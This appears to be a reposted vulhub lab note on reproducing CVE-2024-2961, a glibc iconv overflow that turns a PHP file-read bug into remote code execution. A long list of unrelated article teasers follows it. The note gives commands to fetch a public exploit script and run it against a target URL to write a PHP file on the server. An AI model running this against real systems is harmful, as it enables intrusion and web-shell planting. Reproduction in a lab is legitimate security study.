vulhub中PHP利用GNU C Iconv将文件读取变成RCE（CVE-2024-2961）

vulhub中PHP利用GNU C Iconv将文件读取变成RCE（CVE-2024-2961）

news2025/1/19 8:08:45

GNU C 是一个标准的ISO C依赖库。在GNU C中，iconv()函数2.39及以前存在一处缓冲区溢出漏洞，这可能会导致应用程序崩溃或覆盖相邻变量。

如果一个PHP应用中存在任意文件读取漏洞，攻击者可以利用`iconv()`的这个CVE-2024-2961漏洞，将其提升为代码执行漏洞。

漏洞复现

在使用原作者给出的[exploit](https://github.com/ambionics/cnext-exploits)前，你需要准备一个Linux环境和Python 3.10解释器。

安装依赖：
pip install pwntools
pip install https://github.com/cfreal/ten/archive/refs/heads/main.zip

然后从<https://raw.githubusercontent.com/ambionics/cnext-exploits/main/cnext-exploit.py>下载POC并执行：
wget https://raw.githubusercontent.com/ambionics/cnext-exploits/main/cnext-exploit.py
python cnext-exploit.py http://your-ip:8080/index.php "echo '<?=phpinfo();?>' > shell.php"

已经成功写入shell.php：

本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若转载，请注明出处：http://www.coloradmin.cn/o/1790349.html

如若内容造成侵权/违法违规/事实不符，请联系多彩编程网进行投诉反馈，一经查实，立即删除！

相关文章

Ubuntu20.04 Mysql基本操作知识

Ubuntu20.04 Mysql基本操作知识

#Mysql基本知识运行环境Ubuntu20.04 1.开启mysql服务 sytemctl start mysql不然，命令行进入myql交互行提交命令后，就会出现4200错误。 2.显示所有数据库 SHOW DATABASES;注意复数s，毕竟很多数据库 3.新建数据库test CREATE DATABASE …

阅读更多...

算法训练营第四十六天 | 卡码网52 携带研究材料、LeetCode 518 零钱兑换II、LeetCode 377 组合总和IV

算法训练营第四十六天 | 卡码网52 携带研究材料、LeetCode 518 零钱兑换II、LeetCode 377 组合总和IV

写在前面这次算法训练营题目，其实完全是按照代码随想录一路跟着来的，上面也有更好的、讲得更清楚的题解，有需要的小伙伴可以去那里看。我这里是之前已经大体刷过一遍，为了应对有可能会考到的面试题，现在在跟着一个专…

阅读更多...

WordPress电脑版+手机版自动识别切换主题插件优化版

WordPress电脑版+手机版自动识别切换主题插件优化版

下载地址：WordPress电脑版手机版自动识别切换主题插件优化版插件介绍： 电脑访问自动显示电脑版手机访问自动显示手机版

阅读更多...

Python编程学习第一篇——制作一个小游戏休闲一下

Python编程学习第一篇——制作一个小游戏休闲一下

到上期结束，我们已经学习了Python语言的基本数据结构，除了数值型没有介绍，数值型用的非常广，但也是最容易理解的，将在未来的学习中带大家直接接触和学习掌握。后续我们会开始学习这门语言的一些基础语法和编程技巧，在这之前我们休闲一下，写一个小游戏娱乐一下。小戏用…

阅读更多...

深入理解可燃气体报警器检验标准：守护工业安全新举措

深入理解可燃气体报警器检验标准：守护工业安全新举措

在工业生产领域，可燃气体报警器扮演着至关重要的角色。它能在气体浓度达到危险水平之前发出警报，为工作人员争取宝贵的逃生时间。为了确保可燃气体报警器的准确性和可靠性，我们需要遵循一系列严格的检验标准。在这篇文章中，佰…

阅读更多...

TCP协议的核心机制

TCP协议的核心机制

TCP协议的核心机制一:确认应答机制1.2:超时重传接收缓冲区超时重传时间重置连接一:确认应答机制对于TCP协议来说,要解决的一个很重要的问题,就是可靠传输可靠传输,不是指发送方能够100%的把数据发送给接收方,而是尽可能. 尤其是让发送方知道,接收方是否收到. 举个例子: …

阅读更多...

AI菜鸟向前飞 — LangChain系列之十六 - Agent系列：从现象看机制（下篇）一款“无需传递中间步骤“的Agent

AI菜鸟向前飞 — LangChain系列之十六 - Agent系列：从现象看机制（下篇）一款“无需传递中间步骤“的Agent

前言 AI菜鸟向前飞 — LangChain系列之十四 - Agent系列：从现象看机制（上篇） AI菜鸟向前飞 — LangChain系列之十五 - Agent系列：从现象看机制（中篇）一个Agent的“旅行” 回顾前两篇文章，大家会…

阅读更多...

QT 信号和槽教程，窗体和控件对象之间的沟通一般都使用信号和槽

QT 信号和槽教程，窗体和控件对象之间的沟通一般都使用信号和槽

Qt的信号和槽（Signals and Slots）机制是一种强大的对象间通信方式，它允许对象在完全解耦的情况下相互通信。以下是关于Qt信号和槽的简明教程： 基本概念信号（Signal）：信号是由Qt对象发出的通知…

阅读更多...

Python leetcode239滑动窗口最大值，单调队列解题思路，单调栈的代码模板，单调队列代码实战

1 题目 239. 滑动窗口最大值给你一个整数数组 nums，有一个大小为 k 的滑动窗口从数组的最左侧移动到数组的最右侧。你只可以看到在滑动窗口内的 k 个数字。滑动窗口每次只向右移动一位。返回滑动窗口中的最大值。示例 1： 输入：nums [1…

阅读更多...

硕士课程可穿戴作业归档之三

硕士课程可穿戴作业归档之三

代码运行挑战赛要求根据比赛要求， As in recent challenges, the data have been divided into three sets:- **Learning (training) set A**: includes noninvasive fetal ECG signals, as well as the reference annotations for them (for participants use…

阅读更多...

2022.9.26DAY678

2022.9.26DAY678

课程学习：《数据处理技术》讲了“数据查询”的语法格式，语法格式也算是简单，就是没能跟之前的内容联系起来，之前的内容没有及时回顾。高等数学：“ 函数的概念”，讲了函数的概念，反函数&#…

阅读更多...

C语言中 printf函数格式化输出

C语言中 printf函数格式化输出

一. 简介本文来简单学习一下，C语言中printf函数格式化输出时，因为我们的粗心没有将数据类型与格式化参数对应，而导致的一些问题。二. C语言中printf函数的格式化输出在C语言中，printf函数是用于格式化输出的函数&#xff0…

阅读更多...

Idea 的选择文件后定位瞄准器 “Select Opened File“ 的功能不见了

Idea 的选择文件后定位瞄准器 “Select Opened File“ 的功能不见了

一、问题描述使用Idea 时 “Select Opened File” 的功能不见了，一般是可以通过点击这个瞄准按钮，定位到文件的位置。这个非常坑爹。之前应该是有这个瞄准镜的。二、解决方法右键标题框，选择后点击Always Opened File，即…

阅读更多...

[C][栈帧]详细讲解

[C][栈帧]详细讲解

目录 1.栈帧1.进程地址空间2.栈帧说明 2.认识相关寄存器3.认识相关汇编命令4.过程理解5.栈帧总结6.补充 1.栈帧 1.进程地址空间 .进程地址空间 2.栈帧说明调用函数，形成栈帧函数返回，释放栈帧局部变量是存放在栈区上的栈区内存的使用习惯是&#xff…

阅读更多...

阿里云语音合成TTS直播助手软件开发

阿里云语音合成TTS直播助手软件开发

阿里云的TTS比较便宜，效果比不了开源克隆的那种，比纯机器人效果好一点点阿里云sambert https://help.aliyun.com/zh/dashscope/developer-reference/quick-start-13 Sambert系列模型 1万字1元 ，每主账号每模型每月3万字免费创建API-KEY htt…

阅读更多...

国产操作系统上Vim的详解03--使用Vundle插件管理器来安装和使用插件 _ 统信 _ 麒麟 _ 中科方德

国产操作系统上Vim的详解03--使用Vundle插件管理器来安装和使用插件 _ 统信 _ 麒麟 _ 中科方德

原文链接：国产操作系统上Vim的详解03–使用Vundle插件管理器来安装和使用插件 | 统信 | 麒麟 | 中科方德 Hello，大家好啊！今天给大家带来一篇在国产操作系统上使用Vundle插件管理器来安装和使用Vim插件的详解文章。Vundle是Vim的一款强大的插…

阅读更多...

工业通讯现场中关于EtherCAT转TCPIP网关的现场应用

工业通讯现场中关于EtherCAT转TCPIP网关的现场应用

在当今工业自动化的浪潮中，EtherCAT技术以其高效、实时的特性成为了众多制造业的首选。然而，随着工业互联网的发展，对于数据的远程访问和云平台集成的需求日益增长，这就需要将EtherCAT协议转化为更为通用的TCP/IP协议。于是开疆智…

阅读更多...

Day43 代码随想录打卡|二叉树篇---左叶子之和

Day43 代码随想录打卡|二叉树篇---左叶子之和

题目（leecode T404）： 给定二叉树的根节点 root ，返回所有左叶子之和。方法： 迭代法：计算所有的左叶子节点，那我们就必然要找到所有的左叶子节点。那么怎么找呢？如何针对cur->l…

阅读更多...

Java实现俄罗斯方块游戏源代码（启动即可玩）

这是一个用Java Swing实现的俄罗斯方块游戏，具有经典的游戏机制和图形界面。游戏中，玩家需要旋转和移动不断下落的方块，使其填满一行来消除该行并得分。该项目适合学习Java GUI编程、游戏开发基础以及面向对象编程（OOP&#xff0…

阅读更多...

【Qt】Qt Style Sheets (QSS) 指南：打造个性化用户界面

【Qt】Qt Style Sheets (QSS) 指南：打造个性化用户界面

文章目录前言：1. QSS 选择器2. 子控件选择器（Sub-Controls）2.1. 示例：给 QComboBox 给下拉按钮加上图标2.2. 示例：修改进度条颜色 3. 伪类选择器3.1. 代码示例: 设置按钮的伪类样式.3.2. 代码示例: 使用事件方式实现同…

阅读更多...

推荐文章

最新文章